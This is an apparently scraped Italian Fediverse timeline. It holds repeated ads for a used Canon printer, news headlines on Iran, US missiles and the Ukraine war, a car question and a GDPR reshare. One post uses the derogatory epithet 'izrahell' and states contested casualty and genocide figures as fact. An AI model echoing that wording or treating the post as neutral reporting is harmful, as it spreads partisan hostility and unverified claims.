Price: 0 $ :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️



Trump aumenta la pressione su Teheran. L’Iran prova a resistere


@Notizie dall'Italia e dal mondo
Sanzioni commerciali, dazi e tagli già applicati contro Teheran da anni non sono riusciti a spingere la Repubblica Islamica a rivedere la propria strategia politica e militare
L'articolo Trump aumenta la pressione su Teheran. L’Iran prova a resistere proviene da Pagine Esteri.



Missili ipersonici per l’esercito Usa. Quando arriveranno

@Notizie dall'Italia e dal mondo

Dopo un lungo ritardo dovuto alle difficoltà nei test, l’Esercito degli Stati Uniti prevede di fornire un sistema d’arma ipersonico a lungo raggio alla prima unità entro la fine dell’anno fiscale 2025, secondo quanto dichiarato a Defense News da funzionario del Pentagono. Una data che, comunque, rimane ben lontana dall’obiettivo



A Kursk tornano le truppe nordcoreane. Mosca si gioca il tutto per tutto

@Notizie dall'Italia e dal mondo

Nonostante (e forse a maggior ragione) le manovre diplomatiche in corso tra Stati Uniti e Russia, Mosca non accenna a ridurre la pressione sul fronte ucraino, gettando altri soldati nordcoreani nella mischia. Secondo l’Intelligence sudcoreana, Pyongyang avrebbe inviato altre unità, almeno un migliaio,



Stampante Canon Pixma TS9150 printer - Questo è un post automatico da FediMercatino.it

Prezzo: 150 €

I am selling a Canon Pixma TS9150 series (specs), used three times in total. Available for shipment anywhere in the EEA, in person delivery in Western Liguria and South Piedmont, Italy, and Côte d’Azur in France. Negotiable price.

Price: 150€ – This item is available on FediMercatino.it

Please reply with a direct/private message to the account that posted this, or to @Tommi 🤯.


Vendo una Canon Pixma TS9150 series (specs), usata in totale tre volte. Disponibile per spedizione ovunque nell’EEA, oppure consegna di persona nella Liguria di ponente e sud Piemonte, in Italia, e Costa Azzurra in Francia. Prezzo trattabile.

Prezzo: 150€ – Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell’annuncio, o a @Tommi 🤯.

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️


Stampante Canon Pixma TS9150 printer

I am selling a Canon Pixma TS9150 series (specs), used three times in total. Available for shipment anywhere in the EEA, in person delivery in Western Liguria and South Piedmont, Italy, and Côte d’Azur in France. Negotiable price.


Vendo una Canon Pixma TS9150 series (specs), usata in totale tre volte. Disponibile per spedizione ovunque nell’EEA, oppure consegna di persona nella Liguria di ponente e sud Piemonte, in Italia, e Costa Azzurra in Francia. Prezzo trattabile.

Price: 150 € :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.



in reply to simona

mamma mia si... Se poi leggi cosa contiene il ddl sicurezza siamo fregati. Speriamo che le strutture democratiche tengano


Notizie


vincenzotartaglia.blog/2025/02…


Ho comprato una macchina ibrida, benzina + elettrico. La potenza riportata sul libretto di circolazione è 75 KW, corrispondente a quella del motore termico, quella del motore elettrico non è stata considerata.

Qualcuno sa perché?



18thousand children killed by izrahell


Sorry (REALLY, SINCERELY SORRY) for the Bibas children. I only show here one of the last victims of the #genocide #israel is committing. She was 2 months old. Her name is Sham Youssef Al-Shambar.
She is the 18000th victim. (But we all know that by saying 18 thousand we are underestimating the real number of Palestinian children killed by israel).


Il Molise non esiste.


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/il-molis…
Fuori dal mondo Il Molise esiste, eccome se esiste, ma forse pensa di essere in un universo parallelo dove, a discapito dei Molisani, non si applica il GDPR. Si può vivere senza GDPR? Tecnicamente si, si sopravvive, ma con molte complicazioni. Se mi capitasse di…

Privacy Pride reshared this.




Sensitive content

reshared this

Unknown parent

friendica (DFRN) - Collegamento all'originale
Simon Perry
@fanta ✅️ attento a non vomitare dici? Eh, ci ero vicino, si vede dalla faccia immagino.


Stampante Canon Pixma TS9150 printer - Questo è un post automatico da FediMercatino.it

Prezzo: 150 €

I am selling a Canon Pixma TS9150 series (specs), used three times in total. Available for shipment anywhere in the EEA, in person delivery in Western Liguria and South Piedmont, Italy, and Côte d’Azur in France. Negotiable price.

Price: 150€ – This item is available on FediMercatino.it

Please reply with a direct/private message to the account that posted this, or to @Tommi 🤯.


Vendo una Canon Pixma TS9150 series (specs), usata in totale tre volte. Disponibile per spedizione ovunque nell’EEA, oppure consegna di persona nella Liguria di ponente e sud Piemonte, in Italia, e Costa Azzurra in Francia. Prezzo trattabile.

Prezzo: 150€ – Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell’annuncio, o a @Tommi 🤯.

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️


Stampante Canon Pixma TS9150 printer

I am selling a Canon Pixma TS9150 series (specs), used three times in total. Available for shipment anywhere in the EEA, in person delivery in Western Liguria and South Piedmont, Italy, and Côte d’Azur in France. Negotiable price.


Vendo una Canon Pixma TS9150 series (specs), usata in totale tre volte. Disponibile per spedizione ovunque nell’EEA, oppure consegna di persona nella Liguria di ponente e sud Piemonte, in Italia, e Costa Azzurra in Francia. Prezzo trattabile.

Price: 150 € :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.


reshared this